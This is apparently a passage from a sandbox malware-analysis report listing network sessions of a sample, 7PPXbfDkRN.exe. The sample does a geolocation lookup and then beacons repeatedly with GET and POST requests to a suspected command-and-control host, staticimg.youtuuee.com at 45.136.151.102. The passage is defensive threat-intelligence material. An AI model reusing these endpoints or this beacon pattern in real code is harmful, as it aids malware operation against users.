Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com
Oct 24, 2021 09:46:12.047775030 CEST 690 IN
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 07:46:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 294
Access-Control-Allow-Origin: *
X-Ttl: 53
X-Rl: 42
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6331","lat":47.1937,"lon":8.4202,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.33"}
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.5 49740 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:12.621711016 CEST 808 OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:12.769849062 CEST 946 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: 35{"sid":2149215,"time":1635061572,"rand_str":"FhKDAz"}0
Oct 24, 2021 09:46:12.923156023 CEST 1149 OUT
POST /api/?sid=2149215&key=bd3cb4debade8ca1e0a19fe2ed18b376 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:13.082741976 CEST 1150 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: 22{"status":2,"ip":"102.129.143.33"}0
Session ID Source IP Source Port Destination IP Destination Port Process
10 192.168.2.5 49758 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:24.059860945 CEST 1341 OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:24.206494093 CEST 1341 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: 35{"sid":2149773,"time":1635061584,"rand_str":"32gFmU"}0
Oct 24, 2021 09:46:24.325861931 CEST 1342 OUT
POST /api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:24.523351908 CEST 1342 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
11 192.168.2.5 49760 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:25.600858927 CEST 1343 OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:25.747248888 CEST 1344 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: 35{"sid":2149847,"time":1635061585,"rand_str":"AwJEPn"}0
Oct 24, 2021 09:46:25.915107965 CEST 1344 OUT
POST /api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:26.070641041 CEST 1345 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
12 192.168.2.5 49763 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:27.121689081 CEST 1351 OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:27.268641949 CEST 1354 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: 35{"sid":2149915,"time":1635061587,"rand_str":"8FGVpY"}0
Oct 24, 2021 09:46:27.453737020 CEST 1355 OUT
POST /api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:27.604629040 CEST 1355 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
13 192.168.2.5 49765 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:28.760766983 CEST 1356 OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:28.905373096 CEST 1357 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: 35{"sid":2150019,"time":1635061588,"rand_str":"3VR4XU"}0
Oct 24, 2021 09:46:29.133558035 CEST 1357 OUT
POST /api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:29.287159920 CEST 1358 IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
130 192.168.2.5 49920 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Copyright Joe Security LLC 2021 Page 30 of 58
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
131 192.168.2.5 49923 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
132 192.168.2.5 49924 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
133 192.168.2.5 49925 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
134 192.168.2.5 49926 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
135 192.168.2.5 49927 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
136 192.168.2.5 49928 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
137 192.168.2.5 49929 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
138 192.168.2.5 49930 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
139 192.168.2.5 49931 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
14 192.168.2.5 49766 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:30.222265005 CEST
1359 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:30.368000984 CEST
1359 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 30 39 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 61 78 65 7a 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150093,"time":1635061590,"rand_str":"Paxezy"}0
Oct 24, 2021 09:46:30.462079048 CEST
1359 OUT POST /api/?sid=2150093&key=6e5de35b796142fbcf8f6d325b040018 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:30.613193035 CEST
1360 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
140 192.168.2.5 49932 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
141 192.168.2.5 49933 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
142 192.168.2.5 49934 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
143 192.168.2.5 49935 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
144 192.168.2.5 49936 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
145 192.168.2.5 49937 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
15 192.168.2.5 49767 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:31.909816980 CEST
1361 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:32.101710081 CEST
1361 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 31 38 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 67 4e 64 65 43 43 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150187,"time":1635061591,"rand_str":"gNdeCC"}0
Oct 24, 2021 09:46:32.287842035 CEST
1362 OUT POST /api/?sid=2150187&key=58eda2f16bea8597906a0c39546b4751 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:32.440355062 CEST
1362 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
16 192.168.2.5 49768 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:33.562303066 CEST
1363 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:33.712238073 CEST
1364 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 72 50 35 42 4d 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150263,"time":1635061593,"rand_str":"6rP5BM"}0
Oct 24, 2021 09:46:33.971893072 CEST
1364 OUT POST /api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:34.122612000 CEST
1365 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
17 192.168.2.5 49769 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:35.049237013 CEST
1366 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:35.198050976 CEST
1366 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 32 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 46 4b 4d 75 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150329,"time":1635061595,"rand_str":"hFKMuq"}0
Oct 24, 2021 09:46:35.355761051 CEST
1366 OUT POST /api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:35.506477118 CEST
1367 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
18 192.168.2.5 49770 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:36.540766954 CEST
1368 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:36.688316107 CEST
1368 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 71 6a 44 47 41 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150371,"time":1635061596,"rand_str":"uqjDGA"}0
Oct 24, 2021 09:46:36.806778908 CEST
1369 OUT POST /api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:37.032989025 CEST
1369 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
19 192.168.2.5 49771 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:37.992247105 CEST
1370 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:38.139581919 CEST
1371 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 33 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 76 6b 58 49 4b 34 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150431,"time":1635061598,"rand_str":"vkXIK4"}0
Oct 24, 2021 09:46:38.253591061 CEST
1371 OUT POST /api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:38.409102917 CEST
1372 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
2 192.168.2.5 49747 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:13.880568027 CEST
1150 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:14.029927969 CEST
1187 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 75 79 63 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149263,"time":1635061573,"rand_str":"5Ruycq"}0
Oct 24, 2021 09:46:14.115669966 CEST
1323 OUT POST /api/?sid=2149263&key=30871ac7c5fca22d591ee3c3e3f7faa8 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:14.271146059 CEST
1324 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
20 192.168.2.5 49772 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:39.382689953 CEST
1373 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:39.533291101 CEST
1373 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 37 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 59 39 64 4b 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150479,"time":1635061599,"rand_str":"5RY9dK"}0
Oct 24, 2021 09:46:39.628333092 CEST
1373 OUT POST /api/?sid=2150479&key=d26e2d32e64af0304786124de837af72 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:39.781892061 CEST
1375 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
21 192.168.2.5 49775 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:40.870773077 CEST
1397 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:41.015261889 CEST
